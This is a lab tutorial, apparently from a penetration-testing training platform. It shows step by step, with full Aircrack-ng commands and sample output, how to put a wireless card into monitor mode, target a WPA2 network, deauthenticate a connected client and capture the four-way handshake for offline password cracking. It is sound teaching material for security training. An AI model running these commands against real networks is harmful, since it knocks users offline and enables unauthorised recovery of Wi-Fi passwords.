Introduction
The WPA/WPA2 four-way handshake is a critical component of modern Wi-Fi security. It's the process by which a client and an access point (AP) prove they know the pre-shared key (the Wi-Fi password) without ever transmitting it directly. Capturing this handshake is the first step in a brute-force or dictionary attack to recover the Wi-Fi password.
In this lab, you will learn how to use the powerful Aircrack-ng suite of tools to perform this capture. We will use airmon-ng to put your wireless card into monitor mode, airodump-ng to scan for and target a specific network, and aireplay-ng to force a client to re-authenticate, thereby generating a handshake for us to capture.
This lab simulates a real-world scenario. You will be provided with a wireless interface wlan0 and a target network to practice on within the lab environment.
Put the Wireless Adapter in Monitor Mode
In this step, we will prepare our wireless adapter for capturing network traffic. By default, a wireless adapter operates in "managed mode," meaning it only pays attention to traffic intended for it. To capture all Wi-Fi traffic in the air, we need to switch it to "monitor mode." We will use the airmon-ng tool for this.
First, let's check the name of our wireless interface. Open a terminal and run the iwconfig command.
iwconfig
You should see an interface listed, typically named wlan0.
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Now, use airmon-ng to start monitor mode on the wlan0 interface. This command may kill some network processes that could interfere with the capture.
sudo airmon-ng start wlan0
The output will confirm that monitor mode has been enabled. It usually creates a new virtual interface, often named wlan0mon, for monitoring.
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before bringing up the interface in monitor mode.
PID Name
591 wpa_supplicant
668 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Atheros Communications Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
You can verify that the new interface wlan0mon is in monitor mode by running iwconfig again.
iwconfig wlan0mon
The output should show Mode:Monitor.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Run airodump-ng to Find the Target's BSSID and Channel
In this step, we will use airodump-ng to scan the airwaves and identify our target network. airodump-ng is a powerful tool for capturing 802.11 frames and discovering nearby access points and connected clients.
Now that our interface wlan0mon is in monitor mode, we can start the scan. Run the following command in your terminal:
sudo airodump-ng wlan0mon
Your terminal will fill with a list of all the Wi-Fi networks airodump-ng can detect. The display is split into two parts. The top part lists the Access Points (APs), and the bottom part lists connected clients (Stations).
Let's break down the key columns for the APs:
- BSSID: The MAC address of the Access Point. This is its unique hardware identifier.
- CH: The channel the network is operating on.
- ESSID: The human-readable name of the Wi-Fi network (e.g., "MyHomeWiFi").
Here is an example of what you might see:
CH 6 ][ Elapsed: 3 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -30 10 0 0 6 54e WPA2 CCMP PSK LabEx_WiFi
C8:D3:FF:A1:B2:C3 -65 8 0 0 1 54e WPA2 CCMP PSK AnotherWiFi
BSSID STATION PWR Rate Lost Frames Probe
For this lab, our target network is LabEx_WiFi. From the output above, identify its BSSID (00:11:22:33:44:55) and its CH (6). You will need these for the next step.
Once you have noted the BSSID and channel, press Ctrl+C in the terminal to stop the scanning process.
Run airodump-ng Targeting the Specific BSSID and Channel
In this step, we will focus our capture on the target network only. Running a general scan as we did in the previous step causes the wireless card to "channel hop," which means we could miss the handshake when it happens. To ensure a successful capture, we will tell airodump-ng to lock onto our target's channel and only listen for traffic from its BSSID.
We will also use the -w flag to write the captured packets to a file. This file is what will contain the handshake.
Use the BSSID and channel you identified in the previous step (00:11:22:33:44:55 and 6) to construct the following command. We will name our output file handshake_capture.
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w handshake_capture wlan0mon
After running this command, the airodump-ng display will change. It will now only show information for the LabEx_WiFi network. You will also see a list of any clients (STATIONs) connected to it.
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:32 ][ WPA handshake: ...
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -32 100 25 10 1 6 54e WPA2 CCMP PSK LabEx_WiFi
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -40 1- 1 0 15
Important: Leave this terminal running. We need it to continue capturing. For the next step, you must open a new terminal window. You can do this by clicking the terminal icon in the environment's application dock again.
Use aireplay-ng to Deauthenticate a Client
In this step, we will actively force a handshake to occur. A handshake only happens when a client connects or reconnects to an access point. If a client is already connected, we can wait for them to disconnect naturally, but this could take a long time. A more proactive approach is to force them to disconnect using a "deauthentication attack."
We will use aireplay-ng to send specially crafted deauthentication packets to a client, making it believe it has been disconnected by the AP. The client will then automatically try to reconnect, generating the WPA handshake that our airodump-ng process (running in the other terminal) is waiting to capture.
Look at your first terminal window (the one running the targeted airodump-ng). Under the STATION column, you will see the MAC address of a connected client. For this lab, we will assume the client's MAC address is AA:BB:CC:DD:EE:FF.
Now, in your new terminal window, execute the following aireplay-ng command.
--deauth 5: This sends 5 deauthentication packets. A small burst is usually enough.-a 00:11:22:33:44:55: This is the BSSID of our target Access Point.-c AA:BB:CC:DD:EE:FF: This is the MAC address of the client we are targeting.
sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
You will see output from aireplay-ng confirming that it is sending the packets.
10:35:10 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
10:35:11 Sending 64 directed DeAuths. STMAC: [AA:BB:CC:DD:EE:FF] [ 5|62 ACKs]
Now, let's check if our capture was successful.
Confirm Handshake Capture in the airodump-ng Window
In this final step, we will confirm that we have successfully captured the WPA handshake. The deauthentication attack we just performed should have caused the client to reconnect, and airodump-ng should have captured the resulting handshake.
Switch your focus back to your first terminal window, the one where airodump-ng has been running and targeting LabEx_WiFi.
Look at the top-right corner of the airodump-ng display. If the capture was successful, you will see a message that says [ WPA handshake: 00:11:22:33:44:55 ].
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 00:11:22:33:44:55
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -32 100 80 115 8 6 54e WPA2 CCMP PSK LabEx_WiFi
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -40 1-11 0 98
Seeing this message is your confirmation! You have successfully captured the four-way handshake.
You can now stop both processes by pressing Ctrl+C in each terminal window.
The captured data, including the handshake, has been saved to files in your current directory. You can list them with the ls -l command.
ls -l
You should see several files starting with handshake_capture, most importantly handshake_capture-01.cap.
-rw-r--r-- 1 root root 452 Oct 27 10:36 handshake_capture-01.cap
-rw-r--r-- 1 root root 1234 Oct 27 10:36 handshake_capture-01.csv
...
This .cap file is the prize. It contains the handshake and can now be used with tools like aircrack-ng or hashcat for offline password cracking attempts.
Summary
Congratulations on completing this lab! You have successfully performed one of the fundamental techniques in Wi-Fi penetration testing.
In this lab, you learned how to:
- Put a wireless adapter into monitor mode using
airmon-ng. - Scan for nearby wireless networks to identify a target with
airodump-ng. - Focus
airodump-ngon a specific BSSID and channel to prepare for a targeted capture, saving the results to a file. - Use
aireplay-ngto perform a deauthentication attack, forcing a client to reconnect. - Confirm the capture of the WPA handshake in the
airodump-ngoutput.
The .cap file you generated contains the valuable handshake data. The next logical step in a real engagement would be to use this file to attempt to crack the Wi-Fi password, a topic for another lab. You now have a solid understanding of the manual process for capturing this critical piece of data.